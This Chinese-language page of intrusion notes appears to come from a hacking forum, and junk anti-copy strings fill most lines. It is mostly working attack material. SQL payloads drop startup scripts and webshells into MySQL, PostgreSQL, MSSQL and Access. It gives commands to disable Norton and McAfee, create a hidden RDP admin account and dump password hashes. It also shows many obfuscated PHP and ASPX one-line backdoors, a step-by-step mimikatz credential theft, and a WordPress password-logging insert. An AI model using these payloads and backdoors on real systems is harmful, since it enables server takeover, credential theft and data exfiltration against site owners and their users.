& C* `8 x2 S  k
中文版本操作系统中针对mysql添加用户完整代码:
" b8 y$ b" V( {5 c8 y+ Q% U  H+ b3 K. M' Y1 q
use test;' c: q/ V7 v- o! w
create table a (cmd text);8 U) S5 E8 ~( ~" I/ o. D+ l# k% s
insert into a values ("set wshshell=createobject (""wscript.shell"") " );& ^8 r4 O6 U8 J* p" O* \1 I$ Z
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );- G' ], R2 S# K; g
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
/ _% Z6 i- N1 D) B# yselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";4 P0 L4 S' e; C' o2 O! ]
drop table a;& K3 [. Q3 @* c  s. S) y$ z- F
$ E! z+ Z  Z; o
英文版本:
4 w# T0 {' h% q2 U1 c3 [
) h# B2 s6 X1 @0 @5 suse test;# U  G8 f' k+ P6 B) d) O# R& X
create table a (cmd text);+ R1 }/ n: p, r0 ]0 e  r0 X
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
, q% t% t0 ]* S3 q3 finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 \& r  ?2 W. Ginsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: }: q: N7 S3 W# Z1 h1 \7 Fselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";2 _9 D8 q; j6 y0 [
drop table a;
3 W: a! z. |( Y! a# M& Z( }* t# L9 l* j6 E4 v+ {
create table a (cmd BLOB);
  F9 L- \+ W/ b" h" G0 ^insert into a values (CONVERT(木马的16进制代码,CHAR));
2 T) G! u  [* f; i, T& Iselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'9 {- |4 [2 p/ x# ^+ [
drop table a;& @- [( P% O  K; O# }! p0 K  R
, r4 o4 h$ f1 U6 V
记录一下怎么处理变态诺顿! v# B% s/ R, R+ M8 P: I
查看诺顿服务的路径
" ^3 }0 R" p, i$ m* S4 x& N+ ysc qc ccSetMgr
/ f3 H7 N2 V: a2 d9 ^* l' e: @, j然后设置权限拒绝访问。做绝一点。。! V( O9 N+ y+ [. L* o, }
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
2 ]1 i/ r( @. x8 V, Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"5 O9 X# @% G: \% _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
9 u: f6 ^6 ]* a' E% C" `2 qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
( N) Q" r+ p' g1 k5 x2 Z% y! ^! K- @/ {7 ~9 h
然后再重启服务器% Q) L0 _2 m( [6 k; q0 p' \: i
iisreset /reboot
" u3 w! J: Z$ I5 U+ K6 Z1 w这样就搞定了。。不过完事后。记得恢复权限。。。。) \4 U% P" X4 b5 f$ S; w
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F2 [) m. ?) {5 b- r. R
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F4 Q3 x+ N* _4 M' s1 e
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F% {8 ~7 D% ~1 s2 Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
9 L) u$ P6 y" f6 [* gSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin0 q1 b# n# ^$ x  u3 j5 y* F
" u& A; C) W, i. t
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
1 g! K$ _+ a) z2 x7 c/ _
2 o: {! ~+ }, w! ?1 bpostgresql注射的一些东西2 K) D' S2 D7 I& Y% s6 H
如何获得webshell
1 Y& J! k3 \  _- z1 W- dhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
+ f% N3 C  |& }% \& nhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 6 @% C& W; {, w1 K3 L, s
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
  I8 C" Q3 y3 }: [4 ~9 \0 g: B" s如何读文件  W# [. x, J0 l- H5 g
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);' r7 Q' w" F( v2 ^7 d9 B# E
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;9 O* k" I! g' M7 R
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
3 X' s  ]# d( `0 _+ i6 I
2 E( ?7 l0 R1 b! k; }) [: K8 gz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
" B8 P# h/ J' n! ?3 p* ]9 g" l3 O  \当然,这些的postgresql的数据库版本必须大于8.X
1 J6 x0 h. o! J7 T( ]创建一个system的函数:4 h* _9 W9 @( O, L4 Y
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
( \5 k. l: t0 p3 a7 q
$ y1 d+ Z  o' X+ P" U5 H创建一个输出表:
0 x- Z% p& K, J) s* ^9 O/ VCREATE TABLE stdout(id serial, system_out text)
6 m- i, G- ^$ w+ G9 |! N/ _
1 A$ i. Y% h9 t3 b1 O7 G执行shell,输出到输出表内:: N! `" ]4 [. z+ f2 K/ @
SELECT system('uname -a > /tmp/test')
* h  O5 o& y% N' x/ ~8 f, F$ D8 W) {* s6 m6 }# A) x
copy 输出的内容到表里面;
) S3 _  S9 M$ ?: b% [! eCOPY stdout(system_out) FROM '/tmp/test'8 u7 p& v, {& V% P
' b" ^3 W! _# _( N9 ~1 ?) ~! I
从输出表内读取执行后的回显,判断是否执行成功5 K; J5 |; G  H1 M
4 r- ~' T( t" h+ ?" A, ^
SELECT system_out FROM stdout
' j% F# U! s/ W8 T7 A2 H下面是测试例子2 _* f# A8 ?2 [' T

" @1 G$ D5 E: |7 j- h) d, l* x$ c2 H/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
; ]- C2 n1 z5 ^7 |2 x/ S1 B% v" ~. L/ [6 K
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
' l1 C% _% Y- Q1 t6 E, ]  K5 MSTRICT --
* O+ F3 Q& s2 v3 C' ^7 `6 t5 X
/store.php?id=1; SELECT system('uname -a > /tmp/test') --2 R1 g# w5 M0 u9 h8 u0 _6 j$ R
' d1 o# r+ }. s: l( i
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
% J% d( ~6 Y" o- D
/ Z+ v- @. ^$ e; E# p/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--$ w4 }' b" Y8 Z: Y
net stop sharedaccess    stop the default firewall
7 X- C( D7 M0 o' v" n* [- G1 q& Nnetsh firewall show      show/config default firewall
  A( ~# _" ^% i% m# knetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
5 h9 L5 h$ U3 pnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall  h% e, [" j! T: |0 Z
修改3389端口方法(修改后不易被扫出)
. q& R% y) T6 U7 T  W修改服务器端的端口设置,注册表有2个地方需要修改
/ @" I9 u+ h/ c/ G( h# d: w7 u1 D3 Z5 @. M% G0 K3 Q6 V- B
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
% ^, G( o* z" O, Y2 H! iPortNumber值,默认是3389,修改成所希望的端口,比如6000/ V5 X2 _" {9 j

8 o1 \1 U( T2 F% l! T: q第二个地方:7 i5 [+ Z- I. m" _8 ^
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 6 E' m" _# s( J- x$ R
PortNumber值,默认是3389,修改成所希望的端口,比如60009 `8 n! Y3 g" ]3 {: q# P2 L
5 j5 m/ L9 ^  t2 r4 v' h
现在这样就可以了。重启系统就可以了
" K" g4 q' Q0 w( i& A& I6 x3 ?! b7 K0 H$ ^9 {
查看3389远程登录的脚本1 w. ]5 r& e- [: v- C* M. z' d
保存为一个bat文件$ p' v( T0 e; u2 y6 f% F' \
date /t >>D:\sec\TSlog\ts.log
( d4 o: v8 q5 g6 o( I  z( {4 itime /t >>D:\sec\TSlog\ts.log8 J$ U5 t' g; j- z& ]! d2 K% j/ W
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
% g' Z1 Z, y5 P9 C5 w+ `; Xstart Explorer
3 K& p* m* E! n# U0 u( f. `0 y  ^4 f2 h) V
mstsc的参数:
8 f1 S' ~. _4 W7 G' F2 |2 O5 F# N
7 p  ~# |$ P2 V远程桌面连接; c; |5 d% ]  b9 D  T1 b2 Z

" r8 z  [! I4 qMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
, D; V  {0 n' O9 B" `. R  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?; `% m+ f) Q0 f+ {' x6 _5 q
; z# f/ H% D: G/ R' v$ i
<Connection File> -- 指定连接的 .rdp 文件的名称。" Q' y! O7 Y1 z1 x4 k# M3 k3 F

, P8 k3 S: p- i% M: C4 G/v:<server[:port]> -- 指定要连接到的终端服务器。
: A3 T) C/ ]# K) J# @7 I* z- `& Z' E
/console -- 连接到服务器的控制台会话。
+ f, }  x3 \0 b, ~
% t. C! j( z5 K( A% J/f -- 以全屏模式启动客户端。  ]5 Y' w7 I) T: g- b

2 }+ d9 }7 V4 I5 K9 C/w:<width> --  指定远程桌面屏幕的宽度。+ p( R; h5 t+ ~# V" Z

: W# s6 c6 C; C" V+ ~# c/h:<height> -- 指定远程桌面屏幕的高度。! y7 D9 |! \+ u& \& L
6 j4 n  N# G( K2 a! D  J
/edit -- 打开指定的 .rdp 文件来编辑。! P5 {2 q" a6 V. d% _+ a& \
9 y8 T) E. i, h
/migrate -- 将客户端连接管理器创建的旧版& ~. u" {+ n4 T2 {( L) _
连接文件迁移到新的 .rdp 连接文件。
0 ?6 C' Q5 U0 `, _
7 f# @+ j" c. E
5 z: t# k$ R; Q2 N其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
# m- ~, Q; \5 d9 U3 d1 k# i. L2 Gmstsc /console /v:124.42.126.xxx 突破终端访问限制数量8 N3 `5 m9 h" \0 D
9 ?6 m" [0 ]' O* I  m/ D# b
命令行下开启33897 g$ w0 W0 R& a+ n
net user asp.net aspnet /add8 K5 x, c. w, T3 C) A1 u3 T9 l% R
net localgroup Administrators asp.net /add4 y: P+ ?) L( e: s
net localgroup "Remote Desktop Users" asp.net /add
, R% f6 s4 D% l& [' ^attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D$ S! h* m  P) o% F6 `" v, s6 A4 C
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0+ N. U/ _% `+ x
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
/ Q! |: ^  h0 o, d' {1 h3 |8 F+ iecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
1 \2 k, D" I6 [2 {9 dsc config rasman start= auto
- O; j5 K5 ~8 Nsc config remoteaccess start= auto
6 q# b- P& g" G. B3 f$ @, o9 Y: d: snet start rasman  [. G+ ^& m3 n& v8 m
net start remoteaccess
) x* Y# {, w! q# ?Media
' H: u; j6 \9 A2 n<form id="frmUpload" enctype="multipart/form-data"0 y8 O+ J' E, B9 m$ `" W* x0 U" Y
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>8 f" A/ R/ `8 ~: C& r0 |* f
<input type="file" name="NewFile" size="50"><br>
5 n: h+ m! |$ j& y( Z5 U3 y1 ^: ^<input id="btnUpload" type="submit" value="Upload">
0 M# j( ^% j  l</form>9 o1 V! A8 r- y' b" s
1 t" o1 c5 ?' L. G2 l
control userpasswords2 查看用户的密码
, @! r1 {9 `- N* a/ Vaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径$ y4 Q, N% ^: H! Y1 P* F! `
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
7 t! R! b. z0 q1 S) }+ B
# i/ v' P& ^2 L" Y141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:0 m# ^+ K' I7 t( \2 s& f
测试1:# O. c1 O) z: q3 n4 `
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1  p/ L8 h3 [& D9 K8 {
0 F" b0 j' B3 |' B8 Q2 a" v! \
测试2:
7 f8 [0 M, }5 |
3 s  C) h# I3 d$ Ocreate table dirs(paths varchar(100),paths1 varchar(100), id int)
3 X2 t, W4 M/ z! k. S" H& w4 C+ R( E9 ^, |$ d' h4 ?8 \2 ~
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) w3 O8 X; b" a! K7 U; a; H

6 y5 Y+ z3 b6 a- \  uSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t19 O6 ~  E# r8 O- W* W$ y
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令$ f  e/ v0 x) v6 t, z
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
, e/ n* K4 }% s! e4 N/ wnet stop mcafeeframework$ n5 j7 F" y5 V1 }2 c! U$ U; w
net stop mcshield8 S6 \0 K1 g' G
net stop mcafeeengineservice
% a" o+ Q9 e5 s7 S# ^, l/ |, I8 z7 unet stop mctaskmanager: i% S" d0 o2 m: L6 N; R2 P; Q
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D& N" G# a& {: u- t+ E' g* e. |
1 X. K$ A7 j) x5 }3 r- \% m
  VNCDump.zip (4.76 KB, 下载次数: 1)
+ i5 i; u' _$ |* H( Z; I% D密码在线破解http://tools88.com/safe/vnc.php
  S& h# }, A9 [/ k7 H+ ~/ hVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取- l8 E$ }, w5 L0 b3 r5 _* U

- P% a. q, @) t5 v  V$ Z/ r' jexec master..xp_cmdshell 'net user'+ {. H' o$ ?; J
mssql执行命令。
9 T, q4 M+ }5 d) M  I获取mssql的密码hash查询. Z& D) l) C# @: \, i: y
select name,password from master.dbo.sysxlogins
8 M; g+ I( R7 a4 Y7 y- q9 @* h* ?2 k' c
backup log dbName with NO_LOG;% I; E6 |9 |% h5 ~8 N. U
backup log dbName with TRUNCATE_ONLY;) j1 _' n) \, v8 E4 G# d
DBCC SHRINKDATABASE(dbName);( Q& l3 J, x; ?7 \0 b5 C
mssql数据库压缩
6 q/ ?2 n# k3 g' r& U1 d
3 s# ]: F; u5 I( L' ]- U/ F# r- K7 mRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
* m% c$ \$ u- Z) Y7 x) ]+ K将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
0 `& C7 l, @1 P& u  o9 u
, [4 b" J9 N# W. c  x! _backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
6 L/ V' }4 e; ]/ Q备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
  b! L0 ]) F7 @6 g$ n/ \6 n
( H8 Y" ?+ R# K: Z" v- PDiscuz!nt35渗透要点:+ N  x. ?& F1 l) g5 p3 v
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default. D4 x8 j! Q1 }6 ~, Q! _5 {
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>) J% s! o8 r: u; r& n
(3)保存。
8 s3 s% i& d) x+ U; a) C. _) Q$ q(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
1 [9 @0 E. M- o, Sd:\rar.exe a -r d:\1.rar d:\website\! |1 q2 v( k& O: p- W4 ~; V# S
递归压缩website
" Y8 r4 t: c+ ?$ n) b; O注意rar.exe的路径5 @; F& A' p8 R) G8 f8 J1 ^
4 a. ~' H% b7 h
<?php& r' L" b/ \+ R" Y+ l( O- l6 G

- Y5 v% B2 T! J% ^$telok   = "0${@eval($_POST[xxoo])}";$ E2 }8 e8 L, P5 i% e  F
1 S' U$ J" C' ~9 t% w
$username   = "123456";0 a( q8 V  B7 G# {8 K
, N, T1 q% F, }4 m1 d2 D% |
$userpwd   = "123456";
2 Y/ U8 r# Z3 K8 A4 p2 S: f6 x+ b, O; ~: c
$telhao   = "123456";
! N: h* s- _3 y4 ^: i0 T5 d! |9 I6 g; N
$telinfo   = "123456";
% Q  V" p: U; |9 r) l, \3 h+ w" p
1 R& ?' r3 L5 P9 V% a* v9 @$ ]?>, P0 x, u/ H9 g) O' W6 x
php一句话未过滤插入一句话木马
/ x, d9 |! E. L' D7 n
' |% I& C. H7 P7 Z) ]站库分离脱裤技巧0 D  C- s; V2 B/ I- e* x2 S
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
9 ~2 l# j1 G; m" Q% @5 Sexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'. Y" I, W. G3 K% p/ J, B
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
* B5 l& z; K- S3 @* T9 I这儿利用的是马儿的专家模式(自己写代码)。& |6 k& O& k! K- V0 D: ~
ini_set('display_errors', 1);% ~& k; M# Y" q; q" `
set_time_limit(0);  h# [8 o* |! Y
error_reporting(E_ALL);2 ^- R1 f% E1 [! K
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());! v) f& o9 k" i0 I0 K$ m4 Z
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());  f; H- L2 k% J' L: M1 S
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());+ K5 ]9 U: H+ N3 {# z! y, Q. e& [
$i = 0;
! H( G  [4 f; x9 M& c, r! R0 b$tmp = '';7 q- [  w9 t. n
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
: ]( N7 G" y. r8 L# Z    $i = $i+1;& O+ ]- v1 g) D* ?5 N$ L$ g
    $tmp .=  implode("::", $row)."\n";5 T: @% W' }# q
    if(!($i%500)){//500条写入一个文件+ I  Q: c3 x) T& T+ z! J
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';, e( J/ x" N7 A! `1 s, i4 Y
        file_put_contents($filename,$tmp);1 [  U- t% C  k: {3 G3 r
        $tmp = '';
3 m7 d7 W5 N, K  [  C/ P, F0 ]    }
' b" D% Z' z; |' p}
) z' q; V1 q$ P0 T1 T3 z9 y- Cmysql_free_result($result);
# s: R5 ~4 R) ~4 U7 q+ P6 L' Q7 N4 D2 w
1 i: s( Y3 Z% z: A
' v: y# R  @; h
//down完后delete
, Z6 Z. v  ~! w) z9 C; k4 k2 D
) \$ A5 l( d  ]* L0 o& t  T' `# @8 l+ o8 i
ini_set('display_errors', 1);) x/ S- N8 v# l' V' Q& r
error_reporting(E_ALL);9 i" H  F4 V0 f4 [/ v- F9 i$ @4 e9 z
$i = 0;
7 n% O% m; w. I4 F6 |# Swhile($i<32) {
7 |1 ^" K$ d8 M$ g2 P( V( t    $i = $i+1;4 z9 @1 m) i4 p* s# T
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';4 I" @& P' g! v) ^- W
        unlink($filename);! d' n) u; l6 R2 [8 q
} 2 U8 }- q& j, h  @6 u8 U  h
httprint 收集操作系统指纹/ F0 y" M' Y9 k0 O& x" x
扫描192.168.1.100的所有端口# Z' \" n5 W! c4 v
nmap –PN –sT –sV –p0-65535 192.168.1.100: B: Y& b8 W! e
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
4 Y, D; Y1 m6 w% f" lhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输) j. s1 P1 {/ T: o. T
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
1 m3 C. ?7 S0 E0 ?7 C2 p+ N& K* ~3 a, L7 U4 o" n5 [- s4 B" k: H0 O# w
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)* t+ I; x+ J: z. W

; W! D" f: s( L" B( S4 d8 Y2 c  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
$ g8 r* z' V% R7 u8 b
) E) Z5 [5 N5 m( j, A: ~2 @  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
& v2 g! P$ @! K8 \0 X4 o9 X! c4 C+ [8 s
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)# N. E  v- i5 m4 R
9 ]0 C/ z" q& _& h4 B+ e- m3 z
  http://net-square.com/msnpawn/index.shtml (要求安装)
/ G. T9 O1 n! U$ J8 Z" W0 [8 o* `/ d0 U0 t/ h: G
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
+ v" F2 R2 a2 y1 ]7 q9 y6 j% Z7 E6 T$ x
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
8 E, b5 J5 M: z9 \* Pset names gb23128 Y% \# g7 H2 `& g# k
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
, @& i0 v  r# h1 s& m0 e9 A: T. ^/ h' M, E( z/ |, J
mysql 密码修改
, K6 k) n8 X' E: j0 gUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
! |; d) ]! Y% f( zupdate user set password=PASSWORD('antian365.com') where user='root';& U+ F3 J! I* n9 T) @
flush privileges;
: b& R3 |- t8 B6 C高级的PHP一句话木马后门
( e) {3 h! y" i) H- p( d/ d* g7 Z# m! {# w- w/ a7 m- V
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀, z# [7 F3 j# h6 O, Y# }

* {4 @6 C, y" g; [& R1、
, {  V9 b  a* S! r4 r- y% R; ?5 Z8 p* V$ v0 G
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
3 i" m0 k: g. j1 z/ B
4 |# p  `5 c; ^% \3 b1 c7 C$hh("/[discuz]/e",$_POST['h'],"Access");
" k( V: T4 `; S7 q7 H7 s6 T" |8 E7 c. {! |0 @5 k# \
//菜刀一句话
' w  a8 h# {& ~. f. {! ?. r1 N  y0 T& E/ G/ F$ K; G% T# z
2、
2 U4 d. D9 _. K% F; l
( N3 E; T6 p5 S0 k% T; `$filename=$_GET['xbid'];5 ~7 ?, J$ ~) N- E- ~; j

& x" E7 B1 X5 p) s3 @include ($filename);6 v% S# `) q# i3 i) }6 T, f' `
( j- S, D7 F# w3 H0 f7 e
//危险的include函数,直接编译任何文件为php格式运行" b: Z( Q9 A( M5 x. h
) f6 z% W" ^6 ^3 P) W
3、
4 b' ]( }9 g7 G  H
. V' H8 G4 }: G8 M$reg="c"."o"."p"."y";8 U" \% V7 [0 y& s
9 c5 [# U1 {% d9 y' @* k! {
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
5 s( {0 [. F+ I- q5 y
6 @1 r7 @: _! v* h! r! ]//重命名任何文件2 j) S# K! d" w3 Z2 I

$ t- I5 q6 E: V8 d. t9 Q$ ^2 |7 c4、
3 y+ J( A5 W6 A
' h4 z8 ^0 }4 K$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
% ^- M; L* A6 f" S& O( D
1 c0 M$ A7 L! V  i! X$gzid("/[discuz]/e",$_POST['h'],"Access");) ~8 R: O7 t$ e  r5 b& S' `
' y; `# b& I3 d
//菜刀一句话
" J, g% c9 J; R( |1 ?
1 i5 b/ q( z% }8 D3 T# m5、include ($uid);. X1 F; a" g# b, g1 n+ ~1 A# @! t2 q9 H
+ I) I" L8 M' X8 d2 b7 o; y1 Q; h
//危险的include函数,直接编译任何文件为php格式运行,POST   @+ o/ l, s3 u  i, O  y

# z$ c) V# Q$ H! O# z% I8 \9 i9 W0 `* u; k/ g
//gif插一句话
' ?4 q& [( E# T4 U2 M" Z! F. V& D  U4 I- b5 I
6、典型一句话
# T, Q, t3 O- J( T+ s' d
) O3 m% D9 Z' O; g8 s程序后门代码
( R9 {) D( V9 g0 S1 b8 j<?php eval_r($_POST[sb])?>( u' B! @0 x4 G4 l
程序代码
+ {* W. Y. a  Q, K7 n<?php @eval_r($_POST[sb])?>
! a6 H8 v2 _* x% v2 m2 z9 g//容错代码
- z) e. V2 U1 E6 L7 a9 T3 J( e程序代码8 ]5 M, l; c+ Y7 P# k( v7 G: k
<?php assert($_POST[sb]);?>+ k" e5 R" e! ~0 K
//使用lanker一句话客户端的专家模式执行相关的php语句# {  R& T3 o9 y$ o3 P1 i
程序代码0 y" T% e3 ?9 U( |7 j
<?$_POST['sa']($_POST['sb']);?>
, ?& |' s: f) }' n3 [- o* G# S  q( l程序代码
! |, C! }2 j! c- b, b<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
% Z% e3 L+ x; Q1 Q+ s8 |# ]1 |程序代码
  I: A# e. F; O2 D2 |( h* r8 a<?php
: G5 b) O( E5 j6 f- ?# V@preg_replace("/[email]/e",$_POST['h'],"error");: h) y, y( Y; q2 f$ w
?>
8 ?- i$ f/ b8 b9 N//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入0 J: V0 V2 |# ^" r7 ?6 \/ F$ S
程序代码
4 t" v: _8 F4 d! Z& w2 E" F2 N<O>h=@eval_r($_POST[c]);</O>1 b2 j. n' r5 G$ p9 y
程序代码
, O$ ^( T/ u" c<script language="php">@eval_r($_POST[sb])</script>
9 j+ A( p9 q2 ]! H- Z& i5 v//绕过<?限制的一句话( L& c. \* E9 W" P  _' C* g
+ Y7 L7 Z) J8 @4 y
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
7 U' P$ ~8 R0 s3 f5 d& A; \4 z详细用法:/ R. F$ i7 j- B9 k0 U
1、到tools目录。psexec \\127.0.0.1 cmd
9 B( _; Y1 H  i7 z7 G2、执行mimikatz3 I, c$ R! q- ^+ G
3、执行 privilege::debug
; A- p: I4 |% l0 b- g0 }4、执行 inject::process lsass.exe sekurlsa.dll. j4 W8 ^1 M# c& p: g
5、执行@getLogonPasswords/ Y4 S+ @+ K( r& O4 f- F
6、widget就是密码- ~$ F. U9 z; e: S; |
7、exit退出,不要直接关闭否则系统会崩溃。
- x" ~6 m4 }9 i4 \( T6 H* v
2 e$ ]( q1 @$ U9 C2 F* A1 R' fhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
" P' u  O3 c+ I9 w  X4 o( J$ J) O- [  s1 i) ?+ C
自动查找系统高危补丁6 y* t7 |2 M' |! F4 ]% O
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
# ]. Z3 M+ a* a4 U( }* U' @
/ L' z5 D$ Q8 `) T( A突破安全狗的一句话aspx后门
& h* f4 ^" @: b1 B) v<%@ Page Language="C#" ValidateRequest="false" %>5 I7 G: d+ O# h
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
/ ^5 ?* X' O$ B" n0 Pwebshell下记录WordPress登陆密码
9 L, c# E7 A. h- w. L( Jwebshell下记录Wordpress登陆密码方便进一步社工+ h) D% t  _& g7 S
在文件wp-login.php中539行处添加:5 c& e' N7 q3 y) `2 b
// log password% A  t- }7 ~2 J
$log_user=$_POST['log'];  g9 o0 m$ R0 U" a2 V
$log_pwd=$_POST['pwd'];9 W- |. y3 v5 a! i. N9 z2 U
$log_ip=$_SERVER["REMOTE_ADDR"];& g) X6 `" q+ q6 v
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
3 k8 ~+ M" z' V& n7 S$txt=$txt.”\r\n”;
/ D: t9 Y3 ?, o% I  n, b$ A* Jif($log_user&&$log_pwd&&$log_ip){
; w# B/ f# Q* K# ]0 R" o@fwrite(fopen(‘pwd.txt’,”a+”),$txt);# I" p5 [3 r! c
}
